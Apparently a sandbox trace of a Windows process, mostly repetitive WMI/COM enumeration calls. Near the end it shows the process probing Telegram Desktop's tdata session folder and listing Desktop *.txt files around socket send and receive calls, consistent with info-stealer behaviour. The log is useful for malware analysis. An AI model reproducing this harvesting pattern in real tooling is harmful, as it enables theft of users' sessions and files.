riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.848] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c678, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5719c58) returned 0x0 [0279.848] WbemDefPath:IUnknown:Release (This=0x571c678) returned 0x0 [0279.848] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c688, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.848] WbemDefPath:IUnknown:Release (This=0x571c688) returned 0x3 [0279.849] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c6b8, puReturned=0x27bb39c | out: apObjects=0x571c6b8*=0x571d838, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.859] IMarshal:GetUnmarshalClass (in: This=0x571d83c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.859] IUnknown:Release (This=0x571d83c) returned 0x3 [0279.860] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.860] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.860] IUnknown:Release (This=0x500344) returned 0x1 [0279.861] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c6b8) returned 0x0 [0279.861] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c6b8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.861] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c6b8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5719d38) returned 0x0 [0279.861] WbemDefPath:IUnknown:Release (This=0x571c6b8) returned 0x0 [0279.861] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c6c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.861] WbemDefPath:IUnknown:Release (This=0x571c6c8) returned 0x3 [0279.862] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c6f8, puReturned=0x27bb39c | out: apObjects=0x571c6f8*=0x571d9d0, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.863] IMarshal:GetUnmarshalClass (in: This=0x571d9d4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.863] IUnknown:Release (This=0x571d9d4) returned 0x3 [0279.863] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.864] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.864] IUnknown:Release (This=0x500344) returned 0x1 [0279.864] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c6f8) returned 0x0 [0279.865] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c6f8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.865] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c6f8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5719e18) returned 0x0 [0279.865] WbemDefPath:IUnknown:Release (This=0x571c6f8) returned 0x0 [0279.865] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c708, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.865] WbemDefPath:IUnknown:Release (This=0x571c708) returned 0x3 [0279.866] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c738, puReturned=0x27bb39c | out: apObjects=0x571c738*=0x571db68, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.867] IMarshal:GetUnmarshalClass (in: This=0x571db6c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.867] IUnknown:Release (This=0x571db6c) returned 0x3 [0279.867] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.868] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.868] IUnknown:Release (This=0x500344) returned 0x1 [0279.869] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c738) returned 0x0 [0279.869] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c738, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.869] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c738, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5728fc8) returned 0x0 [0279.869] WbemDefPath:IUnknown:Release (This=0x571c738) returned 0x0 [0279.869] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c748, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.869] WbemDefPath:IUnknown:Release (This=0x571c748) returned 0x3 [0279.870] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c778, puReturned=0x27bb39c | out: apObjects=0x571c778*=0x571dd00, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.871] IMarshal:GetUnmarshalClass (in: This=0x571dd04, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.871] IUnknown:Release (This=0x571dd04) returned 0x3 [0279.872] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.872] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.872] IUnknown:Release (This=0x500344) returned 0x1 [0279.872] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c778) returned 0x0 [0279.873] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c778, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.873] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c778, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x57290a8) returned 0x0 [0279.873] WbemDefPath:IUnknown:Release (This=0x571c778) returned 0x0 [0279.873] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c788, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.873] WbemDefPath:IUnknown:Release (This=0x571c788) returned 0x3 [0279.874] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c7b8, puReturned=0x27bb39c | out: apObjects=0x571c7b8*=0x571de98, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.875] IMarshal:GetUnmarshalClass (in: This=0x571de9c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.875] IUnknown:Release (This=0x571de9c) returned 0x3 [0279.876] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.876] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.876] IUnknown:Release (This=0x500344) returned 0x1 [0279.877] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c7b8) returned 0x0 [0279.877] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c7b8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.877] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c7b8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5729188) returned 0x0 [0279.877] WbemDefPath:IUnknown:Release (This=0x571c7b8) returned 0x0 [0279.877] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c7c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.877] WbemDefPath:IUnknown:Release (This=0x571c7c8) returned 0x3 [0279.878] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c7f8, puReturned=0x27bb39c | out: apObjects=0x571c7f8*=0x571e030, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.879] IMarshal:GetUnmarshalClass (in: This=0x571e034, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.879] IUnknown:Release (This=0x571e034) returned 0x3 [0279.879] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.879] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.879] IUnknown:Release (This=0x500344) returned 0x1 [0279.880] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c7f8) returned 0x0 [0279.880] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c7f8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.880] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c7f8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5729268) returned 0x0 [0279.880] WbemDefPath:IUnknown:Release (This=0x571c7f8) returned 0x0 [0279.880] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c808, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.880] WbemDefPath:IUnknown:Release (This=0x571c808) returned 0x3 [0279.881] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x572f610, puReturned=0x27bb39c | out: apObjects=0x572f610*=0x0, puReturned=0x27bb39c*=0x0) returned 0x1 [0279.882] CoTaskMemFree (pv=0x572f610) [0279.882] IUnknown:Release (This=0x5115f8) returned 0x1 [0279.882] IUnknown:Release (This=0x5115f8) returned 0x0 [0279.883] IUnknown:Release (This=0x511530) returned 0x1 [0279.883] IUnknown:Release (This=0x511530) returned 0x0 [0279.885] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x572efd8 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0279.885] CoTaskMemFree (pv=0x572efd8) [0279.885] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x43e564, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0279.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eaf0) returned 1 [0279.887] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata\\*", lpFindFileData=0x43e8a0 | out: lpFindFileData=0x43e8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e860) returned 1 [0279.892] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", nBufferLength=0x105, lpBuffer=0x43e664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", lpFilePart=0x0) returned 0x39 [0279.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb34) returned 1 [0279.892] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", nBufferLength=0x105, lpBuffer=0x43e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", lpFilePart=0x0) returned 0x39 [0279.892] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata\\*", lpFindFileData=0x43e8e4 | out: lpFindFileData=0x43e8e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8a4) returned 1 [0279.897] CoCreateGuid (in: pguid=0x43e864 | out: pguid=0x43e864*(Data1=0xdfa59bda, Data2=0xe0eb, Data3=0x46c4, Data4=([0]=0x98, [1]=0x13, [2]=0x11, [3]=0x7a, [4]=0xc8, [5]=0x35, [6]=0x5f, [7]=0x6c))) returned 0x0 [0279.897] CoCreateGuid (in: pguid=0x43e7a8 | out: pguid=0x43e7a8*(Data1=0x68881a84, Data2=0xc0ae, Data3=0x42cc, Data4=([0]=0x96, [1]=0xaa, [2]=0x1, [3]=0x63, [4]=0x80, [5]=0x6c, [6]=0x90, [7]=0x2b))) returned 0x0 [0279.897] send (s=0x264, buf=0x27b3d4b*, len=179, flags=0) returned 179 [0279.898] recv (in: s=0x264, buf=0x267e0bc, len=8192, flags=0 | out: buf=0x267e0bc*) returned 128 [0279.958] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0279.958] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\Desktop", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\Desktop") returned 0x1b [0279.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eac0) returned 1 [0279.973] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x43e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0279.973] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*.txt", lpFindFileData=0x43e870 | out: lpFindFileData=0x43e870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e830) returned 1 [0279.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea90) returned 1 [0279.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eac0) returned 1 [0279.974] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x43e5a0, lpFilePart=0x0 | out: 